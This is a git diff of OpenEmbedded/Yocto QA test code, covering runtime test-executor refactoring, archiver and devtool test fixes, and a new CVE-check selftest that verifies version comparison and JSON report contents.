@@ -66,11 +67,11 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
% self.default_target_type)
runtime_group.add_argument('--target-ip', action='store',
default=self.default_target_ip,
- help="IP address of device under test, default: %s" \
+ help="IP address and optionally ssh port (default 22) of device under test, for example '192.168.0.7:22'. Default: %s" \
% self.default_target_ip)
runtime_group.add_argument('--server-ip', action='store',
default=self.default_target_ip,
- help="IP address of device under test, default: %s" \
+ help="IP address of the test host from test target machine, default: %s" \
% self.default_server_ip)
runtime_group.add_argument('--host-dumper-dir', action='store',
@@ -119,8 +120,7 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
# XXX: Don't base your targets on this code it will be refactored
# in the near future.
# Custom target module loading
- target_modules_path = kwargs.get('target_modules_path', '')
- controller = OERuntimeTestContextExecutor.getControllerModule(target_type, target_modules_path)
+ controller = OERuntimeTestContextExecutor.getControllerModule(target_type)
target = controller(logger, target_ip, server_ip, **kwargs)
return target
@@ -130,15 +130,15 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
# AttributeError raised if not found.
# ImportError raised if a provided module can not be imported.
@staticmethod
- def getControllerModule(target, target_modules_path):
- controllerslist = OERuntimeTestContextExecutor._getControllerModulenames(target_modules_path)
+ def getControllerModule(target):
+ controllerslist = OERuntimeTestContextExecutor._getControllerModulenames()
controller = OERuntimeTestContextExecutor._loadControllerFromName(target, controllerslist)
return controller
# Return a list of all python modules in lib/oeqa/controllers for each
# layer in bbpath
@staticmethod
- def _getControllerModulenames(target_modules_path):
+ def _getControllerModulenames():
controllerslist = []
@@ -153,9 +153,8 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
else:
raise RuntimeError("Duplicate controller module found for %s. Layers should create unique controller module names" % module)
- extpath = target_modules_path.split(':')
- for p in extpath:
- controllerpath = os.path.join(p, 'lib', 'oeqa', 'controllers')
+ for p in sys.path:
+ controllerpath = os.path.join(p, 'oeqa', 'controllers')
if os.path.exists(controllerpath):
add_controller_list(controllerpath)
return controllerslist
@@ -175,16 +174,12 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
# Search for and return a controller or None from given module name
@staticmethod
def _loadControllerFromModule(target, modulename):
- obj = None
- # import module, allowing it to raise import exception
- module = __import__(modulename, globals(), locals(), [target])
- # look for target class in the module, catching any exceptions as it
- # is valid that a module may not have the target class.
try:
- obj = getattr(module, target)
- except:
- obj = None
- return obj
+ import importlib
+ module = importlib.import_module(modulename)
+ return getattr(module, target)
+ except AttributeError:
+ return None
@staticmethod
def readPackagesManifest(manifest):
diff --git a/meta/lib/oeqa/sdk/cases/buildepoxy.py b/meta/lib/oeqa/sdk/cases/buildepoxy.py
index 385f8ccca8..f69f720cd6 100644
--- a/meta/lib/oeqa/sdk/cases/buildepoxy.py
+++ b/meta/lib/oeqa/sdk/cases/buildepoxy.py
@@ -17,7 +17,7 @@ class EpoxyTest(OESDKTestCase):
"""
def setUp(self):
if not (self.tc.hasHostPackage("nativesdk-meson")):
- raise unittest.SkipTest("GalculatorTest class: SDK doesn't contain Meson")
+ raise unittest.SkipTest("EpoxyTest class: SDK doesn't contain Meson")
def test_epoxy(self):
with tempfile.TemporaryDirectory(prefix="epoxy", dir=self.tc.sdk_dir) as testdir:
diff --git a/meta/lib/oeqa/selftest/cases/archiver.py b/meta/lib/oeqa/selftest/cases/archiver.py
index bc5447d2a3..6a5c8ec71e 100644
--- a/meta/lib/oeqa/selftest/cases/archiver.py
+++ b/meta/lib/oeqa/selftest/cases/archiver.py
@@ -35,11 +35,11 @@ class Archiver(OESelftestTestCase):
src_path = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['TARGET_SYS'])
# Check that include_recipe was included
- included_present = len(glob.glob(src_path + '/%s-*' % include_recipe))
+ included_present = len(glob.glob(src_path + '/%s-*/*' % include_recipe))
self.assertTrue(included_present, 'Recipe %s was not included.' % include_recipe)
# Check that exclude_recipe was excluded
- excluded_present = len(glob.glob(src_path + '/%s-*' % exclude_recipe))
+ excluded_present = len(glob.glob(src_path + '/%s-*/*' % exclude_recipe))
self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % exclude_recipe)
def test_archiver_filters_by_type(self):
@@ -67,11 +67,11 @@ class Archiver(OESelftestTestCase):
src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS'])
# Check that target_recipe was included
- included_present = len(glob.glob(src_path_target + '/%s-*' % target_recipe))
+ included_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipe))
self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipe)
# Check that native_recipe was excluded
- excluded_present = len(glob.glob(src_path_native + '/%s-*' % native_recipe))
+ excluded_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipe))
self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipe)
def test_archiver_filters_by_type_and_name(self):
@@ -104,17 +104,17 @@ class Archiver(OESelftestTestCase):
src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS'])
# Check that target_recipe[0] and native_recipes[1] were included
- included_present = len(glob.glob(src_path_target + '/%s-*' % target_recipes[0]))
+ included_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipes[0]))
self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipes[0])
- included_present = len(glob.glob(src_path_native + '/%s-*' % native_recipes[1]))
+ included_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipes[1]))
self.assertTrue(included_present, 'Recipe %s was not included.' % native_recipes[1])
# Check that native_recipes[0] and target_recipes[1] were excluded
- excluded_present = len(glob.glob(src_path_native + '/%s-*' % native_recipes[0]))
+ excluded_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipes[0]))
self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipes[0])
- excluded_present = len(glob.glob(src_path_target + '/%s-*' % target_recipes[1]))
+ excluded_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipes[1]))
self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % target_recipes[1])
diff --git a/meta/lib/oeqa/selftest/cases/bblayers.py b/meta/lib/oeqa/selftest/cases/bblayers.py
index f131d9856c..7d74833f61 100644
--- a/meta/lib/oeqa/selftest/cases/bblayers.py
+++ b/meta/lib/oeqa/selftest/cases/bblayers.py
@@ -12,6 +12,11 @@ from oeqa.selftest.case import OESelftestTestCase
class BitbakeLayers(OESelftestTestCase):
+ def test_bitbakelayers_layerindexshowdepends(self):
+ result = runCmd('bitbake-layers layerindex-show-depends meta-poky')
+ find_in_contents = re.search("openembedded-core", result.output)
+ self.assertTrue(find_in_contents, msg = "openembedded-core should have been listed at this step. bitbake-layers layerindex-show-depends meta-poky output: %s" % result.output)
+
def test_bitbakelayers_showcrossdepends(self):
result = runCmd('bitbake-layers show-cross-depends')
self.assertIn('aspell', result.output)
diff --git a/meta/lib/oeqa/selftest/cases/bbtests.py b/meta/lib/oeqa/selftest/cases/bbtests.py
index dc423ec439..0b88316950 100644
--- a/meta/lib/oeqa/selftest/cases/bbtests.py
+++ b/meta/lib/oeqa/selftest/cases/bbtests.py
@@ -148,9 +148,6 @@ INHERIT_remove = \"report-error\"
self.delete_recipeinc('man-db')
self.assertEqual(result.status, 1, msg="Command succeded when it should have failed. bitbake output: %s" % result.output)
self.assertIn('Fetcher failure: Unable to find file file://invalid anywhere. The paths that were searched were:', result.output)
- line = self.getline(result, 'Fetcher failure for URL: \'file://invalid\'. Unable to fetch URL from any source.')
- self.assertTrue(line and line.startswith("ERROR:"), msg = "\"invalid\" file \
-doesn't exist, yet fetcher didn't report any error. bitbake output: %s" % result.output)
def test_rename_downloaded_file(self):
# TODO unique dldir instead of using cleanall
@@ -160,7 +157,7 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
""")
self.track_for_cleanup(os.path.join(self.builddir, "download-selftest"))
- data = 'SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"'
+ data = 'SRC_URI = "https://downloads.yoctoproject.org/mirror/sources/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"'
self.write_recipeinc('aspell', data)
result = bitbake('-f -c fetch aspell', ignore_status=True)
self.delete_recipeinc('aspell')
@@ -188,6 +185,10 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
self.assertTrue(find, "No version returned for searched recipe. bitbake output: %s" % result.output)
def test_prefile(self):
+ # Test when the prefile does not exist
+ result = runCmd('bitbake -r conf/prefile.conf', ignore_status=True)
+ self.assertEqual(1, result.status, "bitbake didn't error and should have when a specified prefile didn't exist: %s" % result.output)
+ # Test when the prefile exists
preconf = os.path.join(self.builddir, 'conf/prefile.conf')
self.track_for_cleanup(preconf)
ftools.write_file(preconf ,"TEST_PREFILE=\"prefile\"")
@@ -198,6 +199,10 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
self.assertIn('localconf', result.output)
def test_postfile(self):
+ # Test when the postfile does not exist
+ result = runCmd('bitbake -R conf/postfile.conf', ignore_status=True)
+ self.assertEqual(1, result.status, "bitbake didn't error and should have when a specified postfile didn't exist: %s" % result.output)
+ # Test when the postfile exists
postconf = os.path.join(self.builddir, 'conf/postfile.conf')
self.track_for_cleanup(postconf)
ftools.write_file(postconf , "TEST_POSTFILE=\"postfile\"")
diff --git a/meta/lib/oeqa/selftest/cases/buildoptions.py b/meta/lib/oeqa/selftest/cases/buildoptions.py
index e91f0bd18f..b1b9ea7e55 100644
--- a/meta/lib/oeqa/selftest/cases/buildoptions.py
+++ b/meta/lib/oeqa/selftest/cases/buildoptions.py
@@ -57,15 +57,15 @@ class ImageOptionsTests(OESelftestTestCase):
class DiskMonTest(OESelftestTestCase):
def test_stoptask_behavior(self):
- self.write_config('BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},100000G,100K"')
+ self.write_config('BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
res = bitbake("delay -c delay", ignore_status = True)
self.assertTrue('ERROR: No new tasks can be executed since the disk space monitor action is "STOPTASKS"!' in res.output, msg = "Tasks should have stopped. Disk monitor is set to STOPTASK: %s" % res.output)
self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output))
- self.write_config('BB_DISKMON_DIRS = "ABORT,${TMPDIR},100000G,100K"')
+ self.write_config('BB_DISKMON_DIRS = "ABORT,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
res = bitbake("delay -c delay", ignore_status = True)
self.assertTrue('ERROR: Immediately abort since the disk space monitor action is "ABORT"!' in res.output, "Tasks should have been aborted immediatelly. Disk monitor is set to ABORT: %s" % res.output)
self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output))
- self.write_config('BB_DISKMON_DIRS = "WARN,${TMPDIR},100000G,100K"')
+ self.write_config('BB_DISKMON_DIRS = "WARN,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
res = bitbake("delay -c delay")
self.assertTrue('WARNING: The free space' in res.output, msg = "A warning should have been displayed for disk monitor is set to WARN: %s" %res.output)
diff --git a/meta/lib/oeqa/selftest/cases/cve_check.py b/meta/lib/oeqa/selftest/cases/cve_check.py
new file mode 100644
index 0000000000..22ffeffd29
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/cve_check.py
@@ -0,0 +1,220 @@
+import json
+import os
+from oeqa.selftest.case import OESelftestTestCase
+from oeqa.utils.commands import bitbake, get_bb_vars
+
+class CVECheck(OESelftestTestCase):
+
+ def test_version_compare(self):
+ from oe.cve_check import Version
+
+ result = Version("100") > Version("99")
+ self.assertTrue( result, msg="Failed to compare version '100' > '99'")
+ result = Version("2.3.1") > Version("2.2.3")
+ self.assertTrue( result, msg="Failed to compare version '2.3.1' > '2.2.3'")
+ result = Version("2021-01-21") > Version("2020-12-25")
+ self.assertTrue( result, msg="Failed to compare version '2021-01-21' > '2020-12-25'")
+ result = Version("1.2-20200910") < Version("1.2-20200920")
+ self.assertTrue( result, msg="Failed to compare version '1.2-20200910' < '1.2-20200920'")
+
+ result = Version("1.0") >= Version("1.0beta")
+ self.assertTrue( result, msg="Failed to compare version '1.0' >= '1.0beta'")
+ result = Version("1.0-rc2") > Version("1.0-rc1")
+ self.assertTrue( result, msg="Failed to compare version '1.0-rc2' > '1.0-rc1'")
+ result = Version("1.0.alpha1") < Version("1.0")
+ self.assertTrue( result, msg="Failed to compare version '1.0.alpha1' < '1.0'")
+ result = Version("1.0_dev") <= Version("1.0")
+ self.assertTrue( result, msg="Failed to compare version '1.0_dev' <= '1.0'")
+
+ # ignore "p1" and "p2", so these should be equal
+ result = Version("1.0p2") == Version("1.0p1")
+ self.assertTrue( result ,msg="Failed to compare version '1.0p2' to '1.0p1'")
+ # ignore the "b" and "r"
+ result = Version("1.0b") == Version("1.0r")
+ self.assertTrue( result ,msg="Failed to compare version '1.0b' to '1.0r'")
+
+ # consider the trailing alphabet as patched level when comparing
+ result = Version("1.0b","alphabetical") < Version("1.0r","alphabetical")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' < '1.0r'")
+ result = Version("1.0b","alphabetical") > Version("1.0","alphabetical")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' > '1.0'")
+
+ # consider the trailing "p" and "patch" as patched released when comparing
+ result = Version("1.0","patch") < Version("1.0p1","patch")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0' < '1.0p1'")
+ result = Version("1.0p2","patch") > Version("1.0p1","patch")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0p2' > '1.0p1'")
+ result = Version("1.0_patch2","patch") < Version("1.0_patch3","patch")
+ self.assertTrue( result ,msg="Failed to compare version with suffix '1.0_patch2' < '1.0_patch3'")
+
+
+ def test_convert_cve_version(self):
+ from oe.cve_check import convert_cve_version
+
+ # Default format
+ self.assertEqual(convert_cve_version("8.3"), "8.3")
+ self.assertEqual(convert_cve_version(""), "")
+
+ # OpenSSL format version
+ self.assertEqual(convert_cve_version("1.1.1t"), "1.1.1t")
+
+ # OpenSSH format
+ self.assertEqual(convert_cve_version("8.3_p1"), "8.3p1")
+ self.assertEqual(convert_cve_version("8.3_p22"), "8.3p22")
+
+ # Linux kernel format
+ self.assertEqual(convert_cve_version("6.2_rc8"), "6.2-rc8")
+ self.assertEqual(convert_cve_version("6.2_rc31"), "6.2-rc31")
+
+
+ def test_recipe_report_json(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "m4-native_cve.json")
+
+ try:
+ os.remove(summary_json)
+ os.remove(recipe_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("m4-native -c cve_check")
+
+ def check_m4_json(filename):
+ with open(filename) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ package = report["package"][0]
+ self.assertEqual(package["name"], "m4-native")
+ found_cves = { issue["id"]: issue["status"] for issue in package["issue"]}
+ self.assertIn("CVE-2008-1687", found_cves)
+ self.assertEqual(found_cves["CVE-2008-1687"], "Patched")
+
+ self.assertExists(summary_json)
+ check_m4_json(summary_json)
+ self.assertExists(recipe_json)
+ check_m4_json(recipe_json)
+
+
+ def test_image_json(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_DIR", "CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ report_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ print(report_json)
+ try:
+ os.remove(report_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("core-image-minimal-initramfs")
+ self.assertExists(report_json)
+
+ # Check that the summary report lists more than one package
+ with open(report_json) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertGreater(len(report["package"]), 1)
+
+ # Check that a random recipe wrote a recipe report to deploy/cve/
+ recipename = report["package"][0]["name"]
+ recipe_report = os.path.join(vars["CVE_CHECK_DIR"], recipename + "_cve.json")
+ self.assertExists(recipe_report)
+ with open(recipe_report) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ self.assertEqual(report["package"][0]["name"], recipename)
+
+
+ def test_recipe_report_json_unpatched(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+CVE_CHECK_REPORT_PATCHED = "0"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "m4-native_cve.json")
+
+ try:
+ os.remove(summary_json)
+ os.remove(recipe_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("m4-native -c cve_check")
+
+ def check_m4_json(filename):
+ with open(filename) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ package = report["package"][0]
+ self.assertEqual(package["name"], "m4-native")
+ # m4-native has only Patched CVEs, so the issue array will be empty
+ self.assertEqual(package["issue"], [])
+
+ self.assertExists(summary_json)
+ check_m4_json(summary_json)
+ self.assertExists(recipe_json)
+ check_m4_json(recipe_json)
+
+
+ def test_recipe_report_json_ignored(self):
+ config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+CVE_CHECK_REPORT_PATCHED = "1"
+"""
+ self.write_config(config)
+
+ vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+ recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "logrotate_cve.json")
+
+ try:
+ os.remove(summary_json)
+ os.remove(recipe_json)
+ except FileNotFoundError:
+ pass
+
+ bitbake("logrotate -c cve_check")
+
+ def check_logrotate_json(filename):
+ with open(filename) as f:
+ report = json.load(f)
+ self.assertEqual(report["version"], "1")
+ self.assertEqual(len(report["package"]), 1)
+ package = report["package"][0]
+ self.assertEqual(package["name"], "logrotate")
+ found_cves = { issue["id"]: issue["status"] for issue in package["issue"]}
+ # m4 CVE should not be in logrotate
+ self.assertNotIn("CVE-2008-1687", found_cves)
+ # logrotate has both Patched and Ignored CVEs
+ self.assertIn("CVE-2011-1098", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1098"], "Patched")
+ self.assertIn("CVE-2011-1548", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1548"], "Ignored")
+ self.assertIn("CVE-2011-1549", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1549"], "Ignored")
+ self.assertIn("CVE-2011-1550", found_cves)
+ self.assertEqual(found_cves["CVE-2011-1550"], "Ignored")
+
+ self.assertExists(summary_json)
+ check_logrotate_json(summary_json)
+ self.assertExists(recipe_json)
+ check_logrotate_json(recipe_json)
diff --git a/meta/lib/oeqa/selftest/cases/devtool.py b/meta/lib/oeqa/selftest/cases/devtool.py
index d8bf4aea08..9efe342a0d 100644
--- a/meta/lib/oeqa/selftest/cases/devtool.py
+++ b/meta/lib/oeqa/selftest/cases/devtool.py
@@ -8,6 +8,7 @@ import shutil
import tempfile
import glob
import fnmatch
+import unittest
import oeqa.utils.ftools as ftools
from oeqa.selftest.case import OESelftestTestCase
@@ -38,6 +39,13 @@ def setUpModule():
canonical_layerpath = os.path.realpath(canonical_layerpath) + '/'
edited_layers.append(layerpath)
oldmetapath = os.path.realpath(layerpath)
+
+ # When poky has been downloaded as a tar.gz archive rather than cloned with git, some tests will be skipped (BUG 12389)
+ try:
+ runCmd('git rev-parse --is-inside-work-tree', cwd=canonical_layerpath)
+ except:
+ raise unittest.SkipTest("devtool tests require folder to be a git repo")
+
result = runCmd('git rev-parse --show-toplevel', cwd=canonical_layerpath)
oldreporoot = result.output.rstrip()
newmetapath = os.path.join(corecopydir, os.path.relpath(oldmetapath, oldreporoot))
@@ -57,7 +65,7 @@ def setUpModule():
if relpth.endswith('/'):
destdir = os.path.join(corecopydir, relpth)
# avoid race condition by not copying .pyc files YPBZ#13421,13803
- shutil.copytree(pth, destdir, ignore=ignore_patterns('*.pyc', '__pycache__'))
+ shutil.copytree(pth, destdir, ignore=shutil.ignore_patterns('*.pyc', '__pycache__'))
else:
destdir = os.path.join(corecopydir, os.path.dirname(relpth))
bb.utils.mkdirhier(destdir)
@@ -269,7 +277,7 @@ class DevtoolAddTests(DevtoolBase):
self.track_for_cleanup(tempdir)
pn = 'pv'
pv = '1.5.3'
- url = 'http://www.ivarch.com/programs/sources/pv-1.5.3.tar.bz2'
+ url = 'http://downloads.yoctoproject.org/mirror/sources/pv-1.5.3.tar.bz2'
result = runCmd('wget %s' % url, cwd=tempdir)
result = runCmd('tar xfv %s' % os.path.basename(url), cwd=tempdir)
srcdir = os.path.join(tempdir, '%s-%s' % (pn, pv))
@@ -340,7 +348,7 @@ class DevtoolAddTests(DevtoolBase):
checkvars['LIC_FILES_CHKSUM'] = 'file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263'
checkvars['S'] = '${WORKDIR}/git'
checkvars['PV'] = '0.1+git${SRCPV}'
- checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https'
+ checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https;branch=master'
checkvars['SRCREV'] = srcrev
checkvars['DEPENDS'] = set(['dbus'])
self._test_recipe_contents(recipefile, checkvars, [])
@@ -442,6 +450,7 @@ class DevtoolAddTests(DevtoolBase):
tempdir = tempfile.mkdtemp(prefix='devtoolqa')
self.track_for_cleanup(tempdir)
url = 'gitsm://git.yoctoproject.org/mraa'
+ url_branch = '%s;branch=master' % url
checkrev = 'ae127b19a50aa54255e4330ccfdd9a5d058e581d'
testrecipe = 'mraa'
srcdir = os.path.join(tempdir, testrecipe)
@@ -462,7 +471,7 @@ class DevtoolAddTests(DevtoolBase):
checkvars = {}
checkvars['S'] = '${WORKDIR}/git'
checkvars['PV'] = '1.0+git${SRCPV}'
- checkvars['SRC_URI'] = url
+ checkvars['SRC_URI'] = url_branch
checkvars['SRCREV'] = '${AUTOREV}'
self._test_recipe_contents(recipefile, checkvars, [])
# Try with revision and version specified
@@ -481,7 +490,7 @@ class DevtoolAddTests(DevtoolBase):
checkvars = {}
checkvars['S'] = '${WORKDIR}/git'
checkvars['PV'] = '1.5+git${SRCPV}'
- checkvars['SRC_URI'] = url
+ checkvars['SRC_URI'] = url_branch
checkvars['SRCREV'] = checkrev
self._test_recipe_contents(recipefile, checkvars, [])
@@ -693,7 +702,44 @@ class DevtoolModifyTests(DevtoolBase):
self.assertTrue(bbclassextended, 'None of these recipes are BBCLASSEXTENDed to native - need to adjust testrecipes list: %s' % ', '.join(testrecipes))
self.assertTrue(inheritnative, 'None of these recipes do "inherit native" - need to adjust testrecipes list: %s' % ', '.join(testrecipes))
+ def test_devtool_modify_localfiles_only(self):
+ # Check preconditions
+ testrecipe = 'base-files'
+ src_uri = (get_bb_var('SRC_URI', testrecipe) or '').split()
+ foundlocalonly = False
+ correct_symlink = False
+ for item in src_uri:
+ if item.startswith('file://'):
+ if '.patch' not in item:
+ foundlocalonly = True
+ else:
+ foundlocalonly = False
+ break
+ self.assertTrue(foundlocalonly, 'This test expects the %s recipe to fetch local files only and it seems that it no longer does' % testrecipe)
+ # Clean up anything in the workdir/sysroot/sstate cache
+ bitbake('%s -c cleansstate' % testrecipe)
+ # Try modifying a recipe
+ tempdir = tempfile.mkdtemp(prefix='devtoolqa')
+ self.track_for_cleanup(tempdir)
+ self.track_for_cleanup(self.workspacedir)
+ self.add_command_to_tearDown('bitbake -c clean %s' % testrecipe)
+ self.add_command_to_tearDown('bitbake-layers remove-layer */workspace')
+ result = runCmd('devtool modify %s -x %s' % (testrecipe, tempdir))
+ srcfile = os.path.join(tempdir, 'oe-local-files/share/dot.bashrc')
+ srclink = os.path.join(tempdir, 'share/dot.bashrc')
+ self.assertExists(srcfile, 'Extracted source could not be found')
+ if os.path.islink(srclink) and os.path.exists(srclink) and os.path.samefile(srcfile, srclink):
+ correct_symlink = True
+ self.assertTrue(correct_symlink, 'Source symlink to oe-local-files is broken')
+ matches = glob.glob(os.path.join(self.workspacedir, 'appends', '%s_*.bbappend' % testrecipe))
+ self.assertTrue(matches, 'bbappend not created')
+ # Test devtool status
+ result = runCmd('devtool status')
+ self.assertIn(testrecipe, result.output)
+ self.assertIn(tempdir, result.output)
+ # Try building
+ bitbake(testrecipe)
def test_devtool_modify_git(self):
# Check preconditions
@@ -843,7 +889,7 @@ class DevtoolUpdateTests(DevtoolBase):
self._check_repo_status(os.path.dirname(recipefile), expected_status)
result = runCmd('git diff %s' % os.path.basename(recipefile), cwd=os.path.dirname(recipefile))
- addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git"']
+ addlines = ['SRCREV = ".*"', 'SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master"']
srcurilines = src_uri.split()
srcurilines[0] = 'SRC_URI = "' + srcurilines[0]
srcurilines.append('"')
@@ -1285,7 +1331,7 @@ class DevtoolExtractTests(DevtoolBase):
# Now really test deploy-target
result = runCmd('devtool deploy-target -c %s root@%s' % (testrecipe, qemu.ip))
# Run a test command to see if it was installed properly
- sshargs = '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no'
+ sshargs = '-o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -o HostKeyAlgorithms=+ssh-rsa'
result = runCmd('ssh %s root@%s %s' % (sshargs, qemu.ip, testcommand))
# Check if it deployed all of the files with the right ownership/perms
# First look on the host - need to do this under pseudo to get the correct ownership/perms
diff --git a/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt b/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt
new file mode 100644
index 0000000000..f70f10e4db
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/diffoscope/A/file.txt
@@ -0,0 +1 @@
+A
diff --git a/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt b/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt
new file mode 100644
index 0000000000..223b7836fb
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/diffoscope/B/file.txt
@@ -0,0 +1 @@
+B
diff --git a/meta/lib/oeqa/selftest/cases/distrodata.py b/meta/lib/oeqa/selftest/cases/distrodata.py
index e1cfc3b621..8e5e24db3d 100644
--- a/meta/lib/oeqa/selftest/cases/distrodata.py
+++ b/meta/lib/oeqa/selftest/cases/distrodata.py
@@ -63,7 +63,7 @@ but their recipes claim otherwise by setting UPSTREAM_VERSION_UNKNOWN. Please re
return True
return False
- feature = 'require conf/distro/include/maintainers.inc\nLICENSE_FLAGS_WHITELIST += " commercial"\nPARSE_ALL_RECIPES = "1"\n'
+ feature = 'require conf/distro/include/maintainers.inc\nLICENSE_FLAGS_WHITELIST += " commercial"\nPARSE_ALL_RECIPES = "1"\nPACKAGE_CLASSES = "package_ipk package_deb package_rpm"\n'
self.write_config(feature)
with bb.tinfoil.Tinfoil() as tinfoil:
diff --git a/meta/lib/oeqa/selftest/cases/glibc.py b/meta/lib/oeqa/selftest/cases/glibc.py
index c687f6ef93..c1f6e4c1fb 100644
--- a/meta/lib/oeqa/selftest/cases/glibc.py
+++ b/meta/lib/oeqa/selftest/cases/glibc.py
@@ -33,7 +33,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
ptestsuite = "glibc-user" if ssh is None else "glibc"
self.ptest_section(ptestsuite)
- with open(os.path.join(builddir, "tests.sum"), "r") as f:
+ with open(os.path.join(builddir, "tests.sum"), "r", errors='replace') as f:
for test, result in parse_values(f):
self.ptest_result(ptestsuite, test, result)
@@ -41,7 +41,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
with contextlib.ExitStack() as s:
# use the base work dir, as the nfs mount, since the recipe directory may not exist
tmpdir = get_bb_var("BASE_WORKDIR")
- nfsport, mountport = s.enter_context(unfs_server(tmpdir))
+ nfsport, mountport = s.enter_context(unfs_server(tmpdir, udp = False))
# build core-image-minimal with required packages
default_installed_packages = [
@@ -61,7 +61,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
bitbake("core-image-minimal")
# start runqemu
- qemu = s.enter_context(runqemu("core-image-minimal", runqemuparams = "nographic"))
+ qemu = s.enter_context(runqemu("core-image-minimal", runqemuparams = "nographic", qemuparams = "-m 1024"))
# validate that SSH is working
status, _ = qemu.run("uname")
@@ -70,7 +70,7 @@ class GlibcSelfTestBase(OESelftestTestCase, OEPTestResultTestCase):
# setup nfs mount
if qemu.run("mkdir -p \"{0}\"".format(tmpdir))[0] != 0:
